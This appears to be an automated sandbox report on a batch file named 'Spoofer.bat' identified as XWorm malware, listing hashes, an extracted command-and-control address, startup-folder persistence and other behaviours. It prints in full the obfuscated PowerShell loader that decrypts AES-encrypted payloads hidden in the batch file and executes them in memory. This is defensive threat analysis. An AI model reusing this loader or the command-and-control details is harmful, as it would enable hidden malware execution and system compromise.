Analysis
max time kernel: 141s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-01-2025 15:00
Static task: static1
Behavioral task: behavioral1
Sample: Spoofer.bat
Resource: win7-20240729-en
General
Target: Spoofer.bat
Size: 293KB
MD5: eafc5ba9f6f74bfced619180451718d1
SHA1: 1bf80060b1af65d0ae1c4e10ba681acdb97127da
SHA256: 1ecacd9c2ab0bc3acfde09e2819c2390e231110f5923fdd9ee26dfe76ccd337f
SHA512: 391e30a38a44bdde182a982067a68442e41f4d43cfee136fd7560c56cc0a537da03dcb6241675c69f3d57bd09d5f385d2674f9f708f450d88cc1314009e6d591
SSDEEP: 3072:3W+656Qjki8jgdcsZ9nd7Ab62C2TMT/CuL9j0XqwQ/HJ7kntdCoq+Saafyl9w5:3W+IWgdc0ZAu2m/7LdZwYHJmDFSJCi5
Malware Config
Extracted
Family: xworm
C2: kind-sofa.gl.at.ply.gg:31503
Install_directory: %ProgramData%
install_file: USB.exe
Signatures
Detect Xworm Payload (1 IoC)
resource: behavioral2/memory/3592-15-0x0000025828AC0000-0x0000025828AD8000-memory.dmp | yara_rule: family_xworm
Xworm family
Blocklisted process makes network request 64 IoCs
flow pid Process 16 3592 powershell.exe 19 3592 powershell.exe 20 3592 powershell.exe 23 3592 powershell.exe 27 3592 powershell.exe 28 3592 powershell.exe 29 3592 powershell.exe 30 3592 powershell.exe 32 3592 powershell.exe 33 3592 powershell.exe 37 3592 powershell.exe 38 3592 powershell.exe 39 3592 powershell.exe 40 3592 powershell.exe 43 3592 powershell.exe 44 3592 powershell.exe 52 3592 powershell.exe 54 3592 powershell.exe 57 3592 powershell.exe 58 3592 powershell.exe 60 3592 powershell.exe 61 3592 powershell.exe 62 3592 powershell.exe 63 3592 powershell.exe 64 3592 powershell.exe 65 3592 powershell.exe 66 3592 powershell.exe 67 3592 powershell.exe 68 3592 powershell.exe 69 3592 powershell.exe 70 3592 powershell.exe 71 3592 powershell.exe 72 3592 powershell.exe 73 3592 powershell.exe 74 3592 powershell.exe 75 3592 powershell.exe 76 3592 powershell.exe 77 3592 powershell.exe 78 3592 powershell.exe 79 3592 powershell.exe 83 3592 powershell.exe 84 3592 powershell.exe 85 3592 powershell.exe 86 3592 powershell.exe 87 3592 powershell.exe 88 3592 powershell.exe 89 3592 powershell.exe 90 3592 powershell.exe 91 3592 powershell.exe 92 3592 powershell.exe 93 3592 powershell.exe 94 3592 powershell.exe 95 3592 powershell.exe 96 3592 powershell.exe 97 3592 powershell.exe 98 3592 powershell.exe 99 3592 powershell.exe 100 3592 powershell.exe 101 3592 powershell.exe 102 3592 powershell.exe 105 3592 powershell.exe 106 3592 powershell.exe 107 3592 powershell.exe 110 3592 powershell.exe -
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Run Powershell and hide display window.
pid: 3592 | Process: powershell.exe
Drops startup file (2 IoCs)
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk | Process: powershell.exe
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk | Process: powershell.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow: 15 | ioc: ip-api.com
Runs net.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid: 3592 | Process: powershell.exe
pid: 3592 | Process: powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Token: SeDebugPrivilege | pid: 3592 | Process: powershell.exe
Token: SeDebugPrivilege | pid: 3592 | Process: powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
description | pid | Process | procid_target
PID 2416 wrote to memory of 3360 | 2416 | cmd.exe | 83
PID 2416 wrote to memory of 3360 | 2416 | cmd.exe | 83
PID 3360 wrote to memory of 2192 | 3360 | net.exe | 84
PID 3360 wrote to memory of 2192 | 3360 | net.exe | 84
PID 2416 wrote to memory of 3592 | 2416 | cmd.exe | 85
PID 2416 wrote to memory of 3592 | 2416 | cmd.exe | 85
Processes
1. C:\Windows\system32\cmd.exe (PID: 2416)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Spoofer.bat"
   Signatures: Suspicious use of WriteProcessMemory
   2. C:\Windows\system32\net.exe (PID: 3360)
      Command line: net file
      Signatures: Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\net1.exe (PID: 2192)
         Command line: C:\Windows\system32\net1 file
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 3592)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('alu9gNFHG/1+ONNuVv38kB6PYCH5Zwt0aaqQhOABIPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TJb0r0olCEvhnI4DkaxyfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mcfDl=New-Object System.IO.MemoryStream(,$param_var); $qjFRZ=New-Object System.IO.MemoryStream; $CoVvH=New-Object System.IO.Compression.GZipStream($mcfDl, [IO.Compression.CompressionMode]::Decompress); $CoVvH.CopyTo($qjFRZ); $CoVvH.Dispose(); $mcfDl.Dispose(); $qjFRZ.Dispose(); $qjFRZ.ToArray();}function execute_function($param_var,$param2_var){ $TXVMP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uDvWJ=$TXVMP.EntryPoint; $uDvWJ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Spoofer.bat';$VhdxI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Spoofer.bat').Split([Environment]::NewLine);foreach ($RSEQe in $VhdxI) { if ($RSEQe.StartsWith(':: ')) { $PYavD=$RSEQe.Substring(3); break; }}$payloads_var=[string[]]$PYavD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82